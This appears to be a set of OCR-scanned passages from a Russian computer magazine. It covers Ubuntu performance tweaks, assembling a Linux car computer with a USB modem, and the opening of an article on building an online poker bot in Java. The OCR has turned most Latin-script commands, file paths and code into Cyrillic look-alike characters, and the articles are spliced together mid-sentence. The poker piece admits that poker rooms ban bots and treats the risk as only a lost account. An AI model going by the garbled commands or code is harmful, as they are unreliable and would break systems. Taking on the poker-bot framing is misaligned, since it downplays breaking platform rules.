Терминале «сЬтосІ +х~/Ьіп/здІі1:е_5І~ігіпк.5І~і». 

4 . Теперь закрой сеанс в ІЛэипІи и перейди в консоль, нажав 
<СбгІ+АН:+Р1 >. Залогинься в консоли и командуй: 

$ зибо /ебс/іпіб . б/дбт збор 
$ зибо /ебс/іпіб . б/кбт збор 

$ ~/Ъіп/зд1ібе_зкгіпк. зк > ~/герогб_зд1ібе_зкгіпк . бхб 

5 . Дождись окончания работы скрипта и перезагружайся: 

$ зибо зкиббоѵт -г +0 

После тотальной реиндексации файлов все программы, использующие 
5СИ_і1:е, получат выигрыш. А какие именно? Читай ~/ герог1;_5р 1ііе_ 
збппк.М, в нем увидишь имена файлов, размер до и после чистки 
и реиндексации. Любители Соодіе СЬготе и КОЕточно будут рады 
данному совету. Периодически повторяй процедуру, и освежающий 
эффект гарантирован. 

СОЗДАНИЕ КЭШЕЙ 

СТК+ может использовать файлы кэша, созданные дік-ирсіаіе-ісоп- 
сасбе, чтобы избежать лишних системных вызовов и дисковых опера- 
ций при запуске приложений. Так как формат кэш-файлов позволяет 
множеству приложений (ттарОеб) совместно их использовать, общее 
потребление памяти тоже сокращается. Нам остается периодически 
запускать скрипт, который вызываетдік-ирсіаіе-ісоп-сасбе, и создавать 
кэши, ускоряющие доступ ктем значкам. Вызовем заодно ію-сасбе, 
который создаетописания для шрифтов. 



$ шкбіг ~/ . сошрозе-саске 

Теперьтвои СД/ОТК программы будут чуток быстрее стартовать и пот- 
реблять меньше памяти, благодаря тому, что ІіЬХ1 1 будет создавать в 
-/.сотрозе-сасбе кэши распарсенной информации и использовать ее 
повторно. 

ПОДКАЧКА цвимш 

В современных операционных системах используется понятие «под- 
качка страниц». Вспомним, что это процесс, который при нехватке 
ОЗУ вытесняет неиспользуемые страницы памяти в область, называ- 
емую разделом подкачки. Когда страница снова нужна, ее загружают 
обратно в ОЗУ. Поскольку своп обитает на жестком диске, который в 
разы медленнее оперативки, активное перемещение страництуда- 
сюда-обратно замедляет работу компьютера в целом. Вывод? Нужно, 
чтобы в компьютере было достаточно ОЗУ для твоих задач. Вывод 
банален, но это так. 

В довершение немного изменим поведение Юбипіи в отношении 
использования ОЗУ и области подкачки. Естьтакой параметр 
ѵт.зѵѵарріпезз, по умолчанию он имеет значение 60 и служит для 
того, чтобы определить процент свободной памяти, при кото- 
ром начнется активный сброс страниц в раздел зѵѵар. Иными 
словами, при памяти, занятой на 40% (100-60), ІІЬипІи уже начнет 
использовать область подкачки. При большом количестве ОЗУ в 
компьютере лучше снизить значение параметра ѵт.зѵѵарріпезз 
до 10, тем самым дав пингвинууказание не использовать зѵѵар, 
пока занятый объем оперативки не достигнет 90% (1 00-1 0). Для 
такого изменения проще всего запустить Терминал и в нем ско- 
мандовать: 

$ зисіо зк -с " ѵтп. зхѵарріпезз = 10" » /ебс/зузсбі . сопб 

После перезагрузки шустрая оперативка будет более эффективно ис- 
пользоваться, а медленный зѵѵар - реже задействоваться. 

ЗАКЛЮЧЕНИЕ 

Ты должен понимать, что настройки всегда по определению консерва- 
тивны, и разработчикОС/программы стремится, чтобы они работали 
на большом спектре систем. Поэтомутюнингоперационки — это не 
нажатие одной кнопки с надписью «Сделать все быстро». Понимая, что 
описано в совете, и анализируя, чем именно достигается ускорение, ты 
аккуратно применяешь команды и внимательно следишьза поведением 
системы. Надеюсь, что советы тебе пригодились, и твой пингвин стал 
более отзывчивым, ц-ц 
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Собираем полноценный автомобильный 
компьютер с Ыпих на борту 




Мечта каждого автомобилиста —это возможность просмотра фильмов, 
подключение к интернету и навигация в автомобиле. Можно исполь- 
зовать специальные устройства — 6Р5-навигаторы, которые частично 
выполняют необходимые функции, но все равно для «полноценнос- 
ти» не хватаетхорошего видеопроигрывателя, последних кодеков и 
привычного браузера. 



ДЛЯ ЧЕГО НУЖЕН АВТОМО- 
БИЛЬНЫЙ КОМПЬЮТЕР? 

Первым делом определим функции автомо- 
бильного компьютера, от этого будет за висеть 
выборжелеза. В большинстве случаев отсагрс 
требуется: 

• Воспроизведение аудио- и видеофайлов; 

• ЭРБ-навигация; 

• Камера заднего вида; 

• Доступ в интернет. 

Сразу хочу заметить: если тебе нужны только 
первыедве функции, проще купить самый обыч- 
ный 6Р5-навигатор, который продается в любом 
автомобильном магазине и стоит в районе 
$100. ..300. В каждом подобном девайсе уже есть 
обе эти функции, таким образом ты сэконо- 
мишь и деньги, и время. Некоторые устройства 
поставляются даже с камерой заднего вида, 
тебе останется лишь подключить ее, следуя 
инструкциям. Изюминка автомобильного ком- 
пьютера —это доступ в интернет. Оченьудобно в 
пути проверитьсвой почтовый ящикили найти в 
Ооодіе адрес ближайшей заправки той сети, где 



ты привыкзаправляться. Конечно, все это нужно 
делать во время остановки автомобиля, а не 
когда управляешь им —думаю, это понятно. 
Компьютер также можно использовать каксис- 
тему видео/аудиорегистрации, то есть записи 
последних 10-20 минут (тут все зависит от разме- 
ра жесткого диска] дорожной обстановки. Такая 
видеозапись поможет доказать свою правоту 
инспектору ДПС или судье. Правда, для реали- 
зации такой системы понадобится установить 
несколько видеокамер. Сагрс можно использо- 
вать и для диагностики автомобиля. Тут решай 
сам: специальный адаптер, используемый для 
подключения к диагностическому разъему, и 
специальное программное обеспечение будет 
стоить дороже всего автомобильного компью- 
тера. Если сам занимаешься ремонтом своего 
авто, то, очевидно, онотого стоит. В противном 
сл уч а е л у ч ш е отка заться от это й зате и . 

ВЫБОРЖЕЛЕЗА 

По большому счету нужно признать, что все 
функции сагрс выполнитобычный ноутбук, 



который можно бросить на заднее сидение и 
использовать по мере необходимости. Тебе 
понадобится лишь зарядное устройство, 
позволяющее «прокормить» ноут от«прикури- 
вателя». В крайнем случае, если такой зарядки 
для твоей модели лаптопа не нашлось, всегда 
можно купить преобразователь напряжения 
(инвертор], который преобразует постоянное 
напряжение бортовой сети автомобиля 
+ 12 В в переменное напряжение 220 В. Дешево 
и сердито: мы только что создали простейший 
автомобильный компьютер. У та кого решения 
есть одно неоспоримое преимущество —его 
очень легко демонтировать, например, при 
парковке машины в ненадежном месте или при 
ее продаже, но недостатков гораздо больше: 

• При запуске двигателя (когда крутится 
стартер] вероятна кратковременная потеря 
напряжения (например, у меня в машине 
подключенные к прикуривателю устройства 
отключаются —это делается, чтобы заряда 
аккумулятора хватило на пускдвигателя], в 
результате компьютер переза грузится. 
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• Если ты забудешь отключить компьютер, и он будет работать на 
незаведенной машине, то в результате будет «сожран» аккумулятор, и в 
следующий раз двигатель уже не заведется. 

• Инвертор требует принудительного охлаждения, а это еще один 
вентилятор (второй будет в блоке питания компьютера], в итоге получаем 
дополнительный источникшума. 

• Как ни крути, а 220 В —это опасно. 

Вместо инвертора нужно использовать автомобильный блок питания 
(АБП). Преимуществу него масса: отсутствие помех, никаких перебоев 
с питанием (крути стартером, сколько надо —компьютер не перезаг- 
рузится], а также наличие интеллекта (при долговременном падении 
напряжения АБП выключит компьютер и предотвратит разрядку акку- 
мулятора]. Но и это не все. С АБП можно достаточно просто реализовать 
включение компьютера при запуске автомобиля, да и никаких 220 В. 




Недостатков у АБП два: стоитон дороже, и его не купишь на обычном 
радиорынке —нужно заказывать. Кстати, о цене: за такой умный блок 
питания придется выложить от $ 1 00. 

Теперь приступим квыбору самого железа. Системник будем строить 
на базе Міпі-ІТХ'ной материнской платы (Міпі-ІТХ —форм-фактор для 
сверхкомпактных материнских плат, разработанный компанией ѴІА 
ТесЬпоІодіез]. Такие материнки совместимы с АТХ, но существенно мень- 
ше по размеру — 170x170 мм. Во сколько обойдется такое удовольствие? 
Намного дешевле, чемты подумал — в пределах$80-120. Корпус, взави- 
симости отего внешнего вида и мощности блока питания, стоит от $38. 
Короб нужно выбирать не более красивый, а такой, который идеально 
поместится в планируемое место установки. Куда именно устанавливать 
компьютер, зависит оттвоего автомобиля. Вотнесколько примеров: 

• Под передним водительским или пассажирским сидением —пре- 
имущество этого расположения в простом доступе к кнопкам питания, 
сброса и 1)5В-портам. Вполне возможно, что даже не придется выводить 
ІІ5В-порты на панель машины итем самым ее уродовать. 

• Под задним сидением — вариант не очень хороший, так как будет 
затруднен доступ к компьютеру (заднее сидение обычно не очень просто 
снимается]. 

• В багажнике —наш Міпі-ІТХ'ный корпус незайметтам много места. Но 
у этого способа естьдва недостатка: потребуется большая длина кабеля 
(для монитора и для питания, если АКБ не в багажнике, а под капотом], а 
также придется разобрать половину салона, чтобы проложить интеркон- 
некты (для монитора, звука, питания]. И еще нужно учитывать тот факт, 
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• ги.ѵѵікіресііа. 
огд/уѵікі/ЦЬипІи 
ЫеіЬоок Ретіх — 
информация о ІІЬипіи 
ЫеіЬоок Ретіх 

• ѵѵѵѵѵѵ.иЬипІи.сот/ 
деіиЬипіи/сІоѵѵпІоасІ- 
пеіЬоок — скачать 
ІІЬипІи ЫеіЬоок 
Нетіх 

• рссагги — форум, 
посвященный авто- 
мобильным компью- 
терам 



что зимой в багажнике температура ниже, чем в салоне, хотя 
отемпературе и компьютере мы поговорим отдельно. 

Мы выбрали материнскую плату, корпус и решили, куда 
будем устанавливать компьютер. С процессором, видеокар- 
той, звуковухой и сетевым контроллером заморачиваться 
не нужно: каменьуже установлен, остальные компоненты 
интегрированы в плату. 1 Гб оперативки вполне хватит, это 
даже с запасом. А вотжесткий дискзаслуживает отдельно- 
го разговора. Старые винчестеры (если ты вдруг решил 
сэкономить и купить б/у] явно не подходят для нашей затеи. 
Всем известно, что дороги в России и странах постсоветс- 
кого пространства далеки от идеала, поэтому постоянная 
тряска быстроубьет старенький хард. А вот любой сов- 
ременный ноутбучный диск нам вполне подойдет. При 
желании можно использовать и новый 3.5", но он крупнее и 
потребляетболышеэнергии. Какза крепить И00 в корпусе? 
Ничего «колхозить» не нужно — достаточно жестко прикру- 
тить его к корпусу через резиновые проставки. 

ВЫБОР МОНИТОРА 
И ЕГО РАЗМЕЩЕНИЕ 

Начнем с размещения, поскольку от этого за висит тип мони- 
тора. Вот несколько вариантов: 

• На передней панели (сверху) —важно, чтобы моник не за- 
крывал обзор, поэтому если ты решил поместить его сверху, 
то чем меньше размер диагонали, тем лучше. Недостаток 
такого решения: монитор будетзаметен снаружи, что при- 
влечетвнимание воров. 

• На передней панели (встроенный) — монитор можно 
встроить в переднюю панель. Пожалуй, наиболее оптималь- 
ный вариант, если позволяет конструкция самой панели. 
Иногда придется менять панель, а это дополнительные 
затраты. Перед установкой моника нужно взвесить все «за» 
и «против». 

• На потолок— все хорошо, нотогда экран (если его раз- 
местить по центру, как обычно и делают) будет виден только 
задним пассажирам. Если видео и интернет предназначены 
только для них, то это оптимальное решение. Аесли же для 
себя любимого, то сам понимаешь... Хотя лучше несовме- 
щатьуправление машиной и ковыряние в компе — будет 
обидно разбить машину, отвечая на сообщение в аське. 

• В солнцезащитный козырек— отличный вариант, подой- 
дет, если ты не хочешь нарушать первозданный (заводской] 




Интерфейс ІпІтаЦпих 



видсвоей панели. Согласись, китайский моникза 100 
баксов будет крайне нелепо смотреться (да еще и на виду, 
криво «вколхоженный»] в дорогом авто. Атак монитор будет 
спрятан от посторонних глаз (и от глаз воров тоже). Когда 
нужно — ты его выдвинешь, когда не нужно —спрячешь. 
Можно как встроить монитор в твой козырек, так и купить 
козырексуже встроенным монитором. Остается только 
переставить один на другой. Недостатков у этого решения 
практически нет, разве что придется перетянуть купленный 
козырек в цвет потолка. Но это уже мелочи —перетяжка 
стоит копейки (знаю на собственном опыте). Козырексуже 
встроенным монитором обойдется около $300. Обычный 
монитор$100-150. 

КОМПЬЮТЕР И ТЕМПЕРАТУРА 

Автомобиль —это не квартира, температура постоянной, 
особенно осенью и зимой, не бывает. Допустим, на улице 
-25°, машина стоитна стоянке;ты приходишь, а комп не 
включается. Немудрено. В и нт за мерз. Да, и если хард 
«попустит», кристаллы на ТРТ тоже замерзнут. Вывод —пока 
салон полностью не прогрет, сагрс включать не стоит. 
Авотлетом... Температурой +30° никого неудивишь. Про- 
цессору будетжарко. Спасетхороший вентилятор и, конечно 
же, кондиционер в машине. Правилотоже: еслиты оставил 
свой «черный бумер» на солнце в невыносимую жару, то 
компьютер лучше не включатьдо понижения температуры в 
салоне. Кстати, о кондиционере —если не хочешь подхватить 
воспаление легких, то оптимальная разница с внешней тем- 
пературой должна составлять не более 6°, а это значит, если 
на улице +30°, то в салоне должно быть не ниже +24°. 

ВЫБОР И НАСТРОЙКА СОФТА 

Итак, надеюсь, ты уже определился с выбором и размеще- 
нием железа. Осталось только установить софт, потому что 
без софта железо так и останется железом. Можно пойти по 
пути наименьшего сопротивления и установить ѴѴіпсІоѵѵз 7 
+ 160-8. В большинстве случаев этого будет достаточно для 
реализации основных функций бортового компьютера. 

А что же насчет свободного ПО и Ыпих? Наш сагрс должен 
летать, поэтому в качестве дистрибутива рекомендую 
использовать ІІЬипІи — простой и в то же время быстрый. 
Кроме того, есть специальная версия ІІЬипіи — ІІЬипІи 
ЫеіЬоок Нетіх — она оптимально подойдет для наших це- 
лей, ведь экранчику нашего компьютера совсем неболь- 
шой. А ЫеіЬоок Ретіх как раз оптимизирован под дисплеи 
небольших размеров. Можно использовать специальные 
сборки на базе ЫеШоок Нетіх, например, от ІпІ'гаЕіпих. 
Послеустановки Ыпих не забудь настроить автоматичес- 
кий вход: Система Администрирование Окно входа 
в систему, иначе при запуске системы придется вводить 
пароль пользователя. 

Первым делом нужно установить кодеки и сделать воз- 
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можным воспроизведение фильмов и музыки. Какобычно, в штатной 
поставке ІІЬипіи кодеков нет, поэтому подключим репо МесПЬипШ для 
установки всего необходимого. Открой терминал и набери команды: 

$ зисіо мдеБ --оиБриБ-<іоситепБ = /еБс/арБ/зоигсез . ІізБ . сі/ 
тесШэипБи. ІізБ ЪББр: //ѵ\плм.тесііЪипБи.огд/зоигсез . 

ІізБ . сЗ./ $ ( 1зЬ_ге1еазе -сз) .ІізБ 
$ зисіо арБ-деБ --диіеБ ирсІаБе 

$ зисіо арБ-деБ --уез --диіеР --аІІоѵ^-ипаиРііепРісаРесі 
іпзРаІІ шесііЬипРи-кеугіпд 
$ зисіо арР-деР --диіеР ирсіаРе 

После этого введи команду для установки кодеков: 

$ зисіо арР-деР ІпзРаІІ ™32сосіесз 

Теперь инсталлируем МРІауег и оболочку для него: 

$ зисіо арР-деР ІпзРаІІ тріауег поп-Ргее-сосіесз 
1іЬсіѵсісзз2 зтріауег 

Пакеты «посередине» — это дополнительные кодеки и библиотека 
0Ѵ0С552, позволяющая читать лицензионные ОѴО-диски. 

Теперь приступим к веб-камере. Ыпих хорошо поддерживает та кие 
гаджеты, нужнотолько выбрать программу для работы. Здесь дефици- 
та тоже нет. Вот неполный перечень программ для работы с камерой: 
сбеезе (самая простая], ѵѵебсат (не всегда почему-то работает], 
сатогата, сатзігеат и др. Выбирай ту, которая больше всего нра- 
вится тебе. 

Следующий шаг — раскочегарить ИЗВ-модем. Однако процедура 
настройки будет разной нетолько для разных операторов, но и для 
разных модемов. Чтобы настроитьсоединение через ЫеБ/ѵогкМападег (у 
меня МТС-Коннект], пришлось немного поковыряться. Забегая вперед, 
скажу, что все описанное ниже можно было реализовать гораздо краси- 
вее — через программу и5Ь_тосІе5\л/і1:сЬ, но я пошел по другому пути. Он 
проверен и работает, поэтому его и опишу в статье. Когда ты подключа- 
ешь модем ксистеме, он сначала определяется какобычная флешка. 
Надо зайти на него и скопироватьодин файл в/изг/ІосаІ/Ьіп: 

$ зисіо ср /тесііа/СШ-68 0/Біпих/ЕБЕѴСНС /изг/1оса1/Ьіп 

После этого открыть/еіс/зибоегз: 

$ зисіо десііБ /еБс/зисІоегз 
И добавить в него следующую строку: 



%асішіп АББ=БОРАЗЗЖ>: /изг/1оса1/Ьіп/ЕБЕѴСНС 

Этим мы разрешаем запуск программы Н0ЕѴСН6 без запроса пароля. 
После этого нужно обеспечить, чтобы модем определялся как модем, а 
не как флешка. Для этого открой фа йл /еіс/исіеѵ/ ги Іез.сІ/70-рег5І5І;еп1:-ссІ . 
гиіез, найди фрагменттекста: 

ЕБѴ{ІБ_СБЕОМ}==" ?*" , ЕБѴ{ІБ_ЗЕЕІАБ}=="СМОТЕСН_ 
Мазз_ЗБогаде_000 000000 002 -О :0 м , ЗУМБШК+ = " ссігоші " , 

ЕБѴ { СЕБЕЕАТЕБ } = " 1 " ЕЫѴ{ ІБ_СБЕОМ} == " ? * " , ЕЫѴ{ІБ_ 

ЗЕЕІАБ } == " СМОТЕСН_Мазз_ЗБогаде_0 00000000002-0 : 0" , 
ЗУМБШК+="сіѵсІ1" , ЕЫѴ { СЕБЕЕАТЕБ } = " 1 " 

и замени его на: 

ЕКГѴ { ІБ_СБЕОМ} =="?*" , ЕБѴ{ ІБ_ЗЕЕІАБ} == " СМОТЕСН_ 
Мазз_ЗБогаде_000 000000 002-0 :0 м , ЗУМБШК+ = " ссігоші " , 

ЕЕГѴ { СЕБЕЕАТЕБ } = " 1 " ЕІШ+ = " /изг/Ьіп/ зисіо /изг/ 
Іосаі/Ьіп/ЕБЕѴСНС" ЕБѴ { ІБ_СБЕОМ} =="?*" , ЕБѴ{ІБ_ 

ЗЕЕІАБ} =="СМОТЕСН_Мазз_ЗБогаде_0 000000 00002 -0 : 0" , 
ЗУМБІ№С+ = " сіѵсіі " , ЕБѴ { СЕБЕЕАТЕБ } = " 1 " ЕІШ+ = " /изг/Ьіп/ 
зисіо /изг/1оса1/Ьіп/ЕБЕѴСНС м 

Теперь в ЫеІѵѵогкМападег правим «Автоматическое соединение 
СОМА». Все параметры оставляем поумолчанию, кроме имени пользо- 
вателя (тЫ и пароля (і піегпеі;] . По аналогии с виндой можно перезапус- 
тить систему —так, на всякий случай. После этого все должно заработать 
как положено. 

Для модемов Апу ОАТААОІЭ-бООА (тоже довольно распространены] мож- 
но использовать программу МТБ Соппесі ( тізсоппесБзоигсеІюгде.пеІ: ]. 
Что касается СРЗ: Ыпих поддерживаетСРЗ-приемники, но лучше 
использовать внешние, а не встроенные вустройства, называемые 
автомобильными 0Р5-навигаторами. Еслиутебя естьавтомобильный 
ОРЭ-навигатор, нетникаких гарантий, что ты заставишьего работать 
под Ыпих. 

Самые удачные СРЭ-программы для Ыпих: Ыаѵіі:, ІапдоОРБ и ОРЭОгіѵе. 
Ыаѵіі: только показываеттекущее положение автомобиля, а остальные 
две могутеще и записывать маршруты. Ни одна программа неумеет 
«разговаривать». А вот даже самые дешевые китайские 0Р5-навигато- 
ры говоритьумеют, да еще и по-русски. Все три проги можно установить 
из репо ІЛэип1:и,такчто с инсталляцией проблем возникнуть не должно. 
Ыаѵіі: использует карты навитела, ІапдоОРЭ и ОРЭОгіѵе — ОрепЭітееіМар 
( ѵѵѵѵѵѵ.орепзігееітар.огд ]. С РЭОгіѵе загружает карты на лету —если кар- 
та текущей местности еще не залита, нужно выполнить команду Орбопз 
Марз -> Ооѵѵпіоасі. 

Вот вроде бы и все. Осталось воплотить описанное в жизньізс 
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Сегодня мы расскажем тебе о создании своего покер-бота. Зачем? 
Во-первых, это интересно -проектировать и писать своего бота, 
состоящего из множества разных компонентов. Во-вторых, это 
познавательно - в процессе можно узнать о математической стороне 
покера и кое-что о проектировании высоконагруженных систем. 



► 090 
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> СІѴСІ 

На диске лежат 
исходники класса, 
реализующего расчет 
вероятности выигры- 
ша, ипіі-тесты к нему, 
исходник калькулято- 
ра, пара статей 
о покер-ботах 
и список интересных 
ссылок. 




| НТТР://ѴѴѴѴѴѴ| 

I Г 

> Ііпк5 



НТО ЕСТЬ ПОКЕР? 

В отличие от шахмат, покер — игра с неполной информа- 
цией. То есть, игроки не знают, какая карта есть на руках у 
оппонентов — они могут это лишь предполагать с опреде- 
ленной степенью вероятности. 

Правила покера просты — выигрывает тот, у кого на руках 
сильнейшая комбинация, составленная из его карт и тех, 
что на столе, или последний оставшийся игрок, если все 
остальные сбросили. Всего в покере десять комбинаций: 
Роял-флеш, Стрит-флеш, Каре, Фулл-хаус, Флеш, Стрит, 
Сет/Трипс/Тройка, Две пары, Одна пара, Старшая карта. 
Существует много разных видов покера. Здесь мы будем 
рассматривать Техаз НоШет N0 ЫтИ: Рокег, он же тур- 
нирный покер. 

ПРОСТАЯ СХЕМА ПОКЕР-БОТА 

Из каких блоков будет состоять наш робот? Рассмотрим по 
пунктам: 

І_одіс — Блок логики принятия решений (Роісі, Са II, Раізе] 
Медоііаіог — Блок взаимодействия с программой для 
игры в покер; 

Біаіізіісз — Блок обработки и накопления статистики по 
игрокам. 

Из ЫедобаТог в І_одіс поступает информация о текущих 
действиях на столе. Из І_одіс в ЫедобаТог — информация 
о своих действиях, которые нужно совершить (сделать 
Роісі, Саіі или Раізе). Из ЫедобаТог в ЗТабзбсз — инфор- 
мация о действиях игрока за столом для последующей 
обработки и хранения. Из ЗТабзбсз в І_одіс — информа- 
ция о статистических данных игроков. 

ПРИНЯТИЕ РЕШЕНИЙ В ПОКЕРЕ 

Как правило, во время каждого хода игрок может при- 
нять три решения: Роісі , Саіі, Раізе. Есть еще АИ-іп 
— когда денег для продолжения игры нет, и придется 
поставить все. Существует множество алгоритмов при- 
нятия решений: БІѴАТ анализ, дерево решений, различ- 
ные эмпирические алгоритмы (кстати, большинство из 
этих алгоритмов используют вероятность выигрыша). Мы 
будем использовать в принятии решений беспристраст- 
ную математику, а точнее — теорию вероятности. 



ПРИМЕЧАНИЕ О ТЕОРИИ ВЕРОЯТНОСТИ 

В реальной жизни она применяется в основном для рас- 
чета отказоустойчивости механизмов, но ее можно очень 
хорошо применять также в играх с неполной информа- 
цией и большим количеством раундов: рулетка, покер, 
блэкджек и др. В теории вероятности есть несколько 
парадоксов, которые не соотносятся с нашим жизненным 
опытом, но, тем не менее, являются правдой. Это, напри- 
мер, парадоксы Монти-Холла и Паррондо. 



Рекомендую почитать 
в вики статьи о поке- 
ре, теории вероятно- 
сти и математическом 
ожидании, посетить 
рокегаі.огс — лучший 
сайт о покерном АІ, а 
также почитать цикл 
статей о создании 
покер-бота на ѵѵѵѵѵѵ. 
сосІіпдіЬеѵѵЬееІ.сопп 



МАТЕМАТИЧЕСКАЯ СТОРОНА 
ПРИНЯТИЯ РЕШЕНИИ В ПОКЕРЕ 



Формула принятия решений в покере чрезвычайно про- 
ста: 



р*роб = чліп, где р — вероятность выигрыша с 
текущими картами (на руках и на столе) , роб 
— размер банка на момент принятия решения, 
тліп — выигрыш, который мы получим, если 
будем разыгрывать множество партий с этими 
картами . 

Если тліп < Ъеб_сшг, то Роісі 



О ЗАКОННОСТИ СОЗДАНИЯ 



По законам РФ и других государств создание 
и использование покер-ботов (и ботов для 
других игр) не запрещено. А по правилам 
всех известных мне покер-румов — запре- 
щено. Что это значит? Если ты попался на 
использовании бота, то самое страшное, что 
тебе грозит — это бан аккаунта и списание 
с него всех средств. Все. Никаких штра- 
фов, повесток в суд, блокировки кредитки и 
т.д. не последует. Кстати, практически во 
всех покер-румах разрешается использование 
«помощников» в игре — различных калькуля- 
торов и программ для сбора статистики. 
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ССЮІЫб 



Если Ъек_сиг + ЗВ > міп >= Ъек_сиг, то Саіі (или 
СЬеск) 

Если ѵгіп >= Ьек_сиг + ЗВ, то Каізе (или Век) 

Ьек_сиг — это все деньги, которые мы положили в банк 
за текущую игру (НЕ только за один круг торговли) , 
плюс те деньги, которые нужно сейчас поставить. 

Пояснения к Ье1;_сиг: 

Если на первом круге торговли мы поставили всего $10, а на втором 
круге мы должны поставить $5, и в этот момент мы принимаем реше- 
ние, то ЬеІ_сиг равно $15 (10+5). 

5В (Зтаіі ВІіпсІ) — размер малого блайнда «(первая ставка вслепую — 
прим. ред.]». Это значение прибавляется к Ье1:_сиг во втором условии, 
так как мы можем увеличивать ставку только на число, кратное малому 
блайнду. Следовательно, если ѵѵіп > ЬеІ_сиг, но при этом ѵѵіп < ЬеІ_сиг 
+ ЗВ, то увеличивать ставку нам не выгодно, так как пришлось выста- 
вить ЬеІ_сиг + 5В. 

ВВ (Від ВІіпсі) - размер большого блайнда. 

Стоит также добавить, что эта формула может использоваться только 
в компьютерной игре — в жизни за столом вряд ли будет возможность 
самому вычислять вероятность выигрыша и все это считать. Поэтому 
при реальной игре используется вычисление аутов (оиЫ и одсов 
(осісЫ. Существуют таблицы для облегчения этих вычислений, которые 
можно найти в любой книжке по покеру и/или в интернете. 

ОБЪЯСНЕНИЕ ФОРМУЛЫ 

Из этой формулы мы получаем математическое ожидание выигрыша (в 
нашей формуле это ѵѵіп). Иначе говоря, разыгрывая много раз игру с такой 
вероятностью (с такими же картами у нас на руках и на столе) и таким бан- 
ком, мы получим такой выигрыш. Следовательно, чтобы оставаться в плюсе, 
мы должны ставить не больше этого выигрыша (на рисунке это ЬеИ). Если 
поставим больше, то окажемся в минусе — выиграем меньше, чем будем 
ставить (на рисунке это Ьеі2). Стоит сделать замечание к формуле — так как 
покер-румы берут комиссию с каждого банка, то нужно размер банка умень- 
шить на величину этой комиссии. Формула с комиссией будет такова: 

р*роб*0,91 = тлгіп 

РАСЧЕТ ВЕРОЯТНОСТИ 

Если размер банка и размер ставки величины вполне известны, то 
как узнать вероятность выигрыша? На этот вопрос есть несколько 
ответов: 

1) Узнать, сколько комбинаций хуже нашей текущей руки, и разделить 
это число на количество комбинаций; 

2 ) Промоделировать несколько сотен тысяч раз ситуацию со своими 
картами на руках и на столе и со случайными картами у оппонентов, 
затем разделить число выигрышных раундов на их общее количество 
(набор методов, в которых используются случайные числа и большое 
число повторений, называются методами Монте-Карло. Да, да назва- 
ние произошло от знаменитого казино в Лас-Вегасе). 

Плюс первого метода — самая высокая точность. 

Минусы — большое потребление памяти и сложность предваритель- 
ного расчета. Так как всего комбинаций может быть 2.598.960 (число 
сочетаний 5 карт из 52), в памяти это будет занимать примерно 10Мб 
(из расчета, что на одну комбинацию отводится 4 байта для хранения 
вероятности). Несмотря на то, что это значение уменьшится, поскольку 
некоторые комбинации будут одинаковы по силе и их можно будет 
свести в одну (за счет того, что масти в этих комбинациях не важны), 
этот метод мы пока рассматривать не будем, а перейдем к следующему. 
Плюс второго метода — простота реализации. 

Минусы — при малом числе раундов не очень точен, а большое число 
раундов требует больше ресурсов процессора. 







у \ 

О ЬеИ ѵѵіп Ье12 роі 



Пример распределения выигрыша при большом 
количестве игр 

КОДИРУЕМ РАСЧЕТ ВЕРОЯТНОСТИ 

На данный момент можно найти множество библиотек для расчета 
вероятности выигрыша. Есть как бесплатные, так и платные версии. 

А мы изобретем свой велосипед. Почему? Чтобы разобраться в этом 
вопросе детальнее и из-за желания сделать полностью своего бота. 
Здесь я дам краткие пояснения к коду. Он написан на Заѵа и снабжен 
документацией в виде ЗаѵаОос, так что ты без труда сможешь разо- 
браться в нем. 

Замечания по кодированию карт: 

Всего 52 карты = 4 масти х 13 карт каждой масти. Масть текущей 
карты = порядковый номер карты>/4 (/ — целочисленное деление). 
Достоинство текущей карты = порядковый номер карты>%13 (% - 
остаток от деления). 

Собственно, у нас должно быть 10 функций по определению комбина- 
ции. Назовем их так: 

ізНідкСагсІ, ізОпеРаіг, ізТѵгоРаіг, ізЗек, ізЗкгаідЫс , 
ізЕІизЬ, ізЕиІІНоизе, ізОиасІз, ізЗкгаідккРІизІт, 
ізКоуаІЕІизЬ. . 

Объединяет эти функции следующее — на входе подается набор карт, 
а на выходе — число от -1 до 12, где -1 — комбинация не найдена, от 
0 до 12 — старшая карта в комбинации. 0 это двойка, 1 — тройка, и так 
до 12 — туз. Масть не важна. Набор карт может быть любой длины — 

«На данный момент можно 
найти множество библиотек 
для расчета вероятности 
выигрыша. Есть как 
бесплатные, так и платные 
версии. А мы изобретем 
свой велосипед» 



► 092 
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РгоЬаЫІІІу о? ѵѵіп: 0.634... 



Саісиіаіе 



сгозз - * зрасіез - * 
сііагпопсіз - ♦ ИеаТ- * 



Покерный калькулятор 



от 1 до 7. Это сделано для того, чтобы можно было легко рассчитать 
вероятности и в пре-флопе (когда карты на стол еще не положили, но 
раздали карты игрокам], и в терне и ривере (когда на стол положили 
четыре и пять карт соответственно]. То есть теперь нам нужно будет 
дать функции список всех карт, которые лежат на столе и у игрока, а 
функция из этого набора карт выделит комбинацию. 

Чтобы оптимизировать определение комбинаций, мы сделаем следующее: 

1) Упорядочим комбинации по убыванию достоинства карт; 

2) Разделим входной массив карт на три: массив с достоинствами 
карт, массив с мастями карт и массив с количеством карт каждой 
масти. 

Эти действия будет выполнять функция зогіНапсІ (см. врезку]. 

Входной параметр — массив ЬапсІ, в котором хранится список карт. 
Выходные параметры — массивы сагб (достоинства карт], зиііе (масти 
карт], зиііеСоипі (количество карт каждой масти]. В первой части 
функции происходит простая сортировка заменой (можно заменить ее 
на быструю сортировку]. Тут есть маленький нюанс — сортируются не 
сами карты, а их достоинства. Чтобы узнать достоинство карты, нужно 
узнать остаток от деления на 13. Дальше, если достоинства карт оди- 
наковы, то проверяем, чтобы карты с большим порядковым номером 
(карты, у которых номер масти больше] были «левее» карт с меньшим 
номером. После сортировки вычисляем достоинства карт (массив 
сагб], масти карт (массив зиііе] и количество карт каждой масти (мас- 
сив зиііеСоипі]. 

Функция сортировки массива карт 

ѵоіЬ зогРНапсі ( іпР [ ] ііапсі , іпр[] сагсі, 

[] зиіРе, іпР [ ] зиіРеСоипР) { 

Рог (іпР і = 0; і < ііапсі . ІепдРЬ; і + +) { 

Рог (іпР з = 0; 3 < ііапсі . ІепдРЬ. - 1; з++) { 

ІпР Р ; 

ІР (ііапсі [Ц % 13 < ііапсі [3 + 1] % 13) { 

Р = ііапсі [ з + 1 ] ; 
ііапсі [ з + 1 ] = ііапсі [ з ] ; 
ііапсі [ з ] = Ы 



ФУНКЦИЯ ОПРЕДЕЛЕНИЯ 



деРСотЬіпаРіоп ( і пР [ ] ііапсі, іпР [ ] Ьоагсі) { 

[] аІІСагсі; 

